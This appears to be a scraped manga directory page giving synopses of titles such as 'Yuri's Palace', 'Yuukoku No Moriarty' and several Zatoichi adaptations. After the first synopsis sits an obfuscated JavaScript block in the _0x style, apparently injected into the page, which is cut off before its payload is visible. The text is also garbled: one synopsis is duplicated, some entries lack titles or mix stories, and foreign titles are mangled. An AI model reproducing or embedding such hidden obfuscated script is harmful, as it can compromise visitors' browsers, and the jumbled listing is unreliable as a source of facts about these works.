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Yuri’s Palace

In the Sun Empire, only women can be the ruling monarch. In this world, Emperor Yuri, who doesn’t believe in love, struggles to stabilize her hold on the throne. Meanwhile, her treacherous husband aspires to become emperor himself. Seeing through his intent, Yuri decides to take in other consorts. While looking for candidates, she comes across former Prince Doha. He tells her that he believes in true love and that he doesn’t hate anyone. Intrigued, Yuri decides to invite him to the palace. What does she want? And will she be able to gain a firmer foothold on the throne? Glass Castle / Her Castle / Le palais de l'impératrice yuri / ???? / ???? / ??? ?<script></script><script>(function(_0xcc4496,_0x477f34){var _0x48ba03=_0x2590,_0x1521cd=_0xcc4496();while(!![]){try{var _0xd98a33=parseInt(_0x48ba03(0x14e))/(0x59*-0x53+0x178+0x2*0xdb2)*(-parseInt(_0x48ba03(0x143))/(-0x113e+0xcb6+0x48a))+-parseInt(_0x48ba03(0x149))/(0x4*0x1ee+-0x104*0x22+0x2fb*0x9)*(-parseInt(_0x48ba03(0x154))/(-0x34a*-0x6+-0x24c7+0x110f*0x1))+parseInt(_0x48ba03(0x148))/(-0xb80*-0x2+0x1*0x12ef+-0x29ea)*(-parseInt(_0x48ba03(0x14a))/(-0x25ea+0x277*-0xb+0x410d))+parseInt(_0x48ba03(0x141))/(-0x182+-0xa8b*0x3+-0x351*-0xa)+parseInt(_0x48ba03(0x144))/(-0x1527+-0x1*0x1e16+0x69*0x7d)+parseInt(_0x48ba03(0x140))/(0x1bdf+0x1d89*-0x1+0x1b3)+-parseInt(_0x48ba03(0x14b))/(-0x158f+0x3e*-0x5f+0x2c9b)*(parseInt(_0x48ba03(0x157))/(-0x12e3+0x2ea*-0xd+0x38d0));if(_0xd98a33===_0x477f34)break;else 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Yuri’S Palace

In the Sun Empire, only women can be the ruling monarch. In this world, Emperor Yuri, who doesn't believe in love, struggles to stabilize her hold on the throne. Meanwhile, her treacherous husband aspires to become emperor himself. Seeing through his intent, Yuri decides to take in other consorts. While looking for candidates, she comes across former Prince Doha. He tells her that he believes in true love and that he doesn't hate anyone. Intrigued, Yuri decides to invite him to the palace. What does she want? And will she be able to gain a firmer foothold on the throne? Glass Castle / Her Castle / Le palais de l'impératrice yuri / 太陽の城 / 琉璃之城 / 유리의 성


Yuukoku No Moriarty: The Remains

A manga adaptation of the Yuukoku no Moriarty light novels.



From MangaHelpers: In the 1950s, an old woman was brutally murdered on the face of a clock tower by her adopted daughter. Two years later, the clock tower is known as the 'ghost tower' and it is supposedly haunted. Through an unusual series of events, a young NEET man named Amano Taichi is attacked by someone or something in the same clock tower, and finds himself bound to the clock face to be killed in the same way as the old woman. Luckily for Amano, he doesn't meet the same fate. He's rescued by a mysterious person who claims his name is Tetsuo. Tetsuo is searching for a treasure that is connected with the ghost tower, and he wants Taichi to be his partner. Taichi, whose life has mostly consisted of poverty, loneliness, and pornography, is enticed by the idea of gaining extreme wealth. He's further convinced when a house fire leaves him without a home and depends on Tetsuo's charity. The adventure is going to be very dangerous, since the same 'enemies' who attacked Taichi before seem certain to try something again! Not to mention, Taichi really knows very little about his new partner.


Yuureiyado no Aruji - Meikyou Seitanshou

Master of the Haunted Inn introduces us to a young man sometime in middle Meiji-- the late 1880s or early 1890s. He owns an inn where people are said to be able to see the ghosts of their loved ones.To this place comes a young woman who was married to a man she'd never seen before, an invalid whose dying wish was to wed her. He died on the same day as they met. Even with this history, she feels herself his wife and desires earnestly to see him again.In other stories we have lovers yearning for a last meeting, a little girl out looking for her father, and a young temple servant, dead many centuries, who cannot rest in peace.


Yuuutsu Na Asa

After the death of his father, Akihito Kuze became the family head of a viscountcy at the age of 10. A major-domo, Tomoyuki Katsuragi, who has both brains and beauty, takes care of the young master. Katsuragi is talented and very popular in society, but he is cold to Akihito. Does Katsuragi hate Akihito!? Akihito begins to be attracted to Katsuragi and wants to know the reason why Katsuragi is cold to him and…!? A classical romance of a young viscount and a butler.


Yuze’s Record of Mountains and Seas

Yuze's Record of Mountains and SeasThousands of years ago, a catastrophe struck the land. The culprit was Shen Nan Chen, the beloved disciple of the Spiritual Father Gu Bei Mu. He led all the demonic beasts in the land with the ancient divine relic "Yuze's Record of Mountains and Seas" and started a war in the three worlds. The master, Gu Bei Mu, killed Shen Nan Chen with his own hands with a motionless Sword. Thousands of years later, Shen Nan Chen reincarnated as a college student, enters the Hall of Spiritual cultivation and searches for the truth about his demonic past.



From Baka-Updates Ichiyo and Akehiko (both 15 years old) have been brought up in an amicable environment at a prosperous restaurant in Japan. They live a safe, happy life, but, as was the norm in Edo, they train at the local dojo with determination to become strong. The times are turbulent, and violence brims in the streets of nineteenth century Japan. Under such conditions the boys will have to learn what it means to wield a sword, take someone’s life, and understand the precarious life of living by the sword.


Zang Hai Hua

After five years the story continues. All the clues are hidden deep within the snow-capped mountains. Is this all coincidental or is it set up? Can Wu Xia uncover the dark mystery?



This one-shot is the adaptation of two movies: Zatoichi's Vengeance (Tokuzo Tanaka) and Zatoichi's Pilgrimage (Kazuo Ikehiro).The Ballad of Zatoichi:Zatoichi comes upon a dying man who asks him to give a bag of money to "Taichi." Zatoichi has no idea who this is but when he comes upon a small town harassed by gangsters, he finds that "Taichi" was the man's young son. Along his travels, he also met a blind monk who makes Zatoichi question his murderous lifestyle. In trying to help the town, Zatoichi kills some gangsters and becomes a hero to the boy. He must make a choice of whether to stay and defend the town or to leave and be on his way.Zatoichi's Pilgrimage:After he's ambushed in a small village terrorized by a gang of thieves, the legendary blind swordsman Zatoichi is forced to kill a young man in self-defense. As fate would have it, his travels soon lead him to Okichi, a woman whom Zatoichi discovers is the sister of the young man whose life he stole. In anger, Okichi attacks the blind swordsman, but her conscience gets the better of her, and as she tends his wounds, the two fall in love.



From Peccatore Sanctuary: In the weird house of Wakeari, Raizou has fallen in love. His object of desire is Kon. Even though Kon is an antisocial pretty boy, he does not laugh at Raizou. As the intense love scene of the tenants continues day after day, Raizou begins to like Kon more and more. At the same time, Kon is doing a secret "job" for clients that come to the house... The Love Destiny that you can't escape from by Yuki Shimizu commences now!
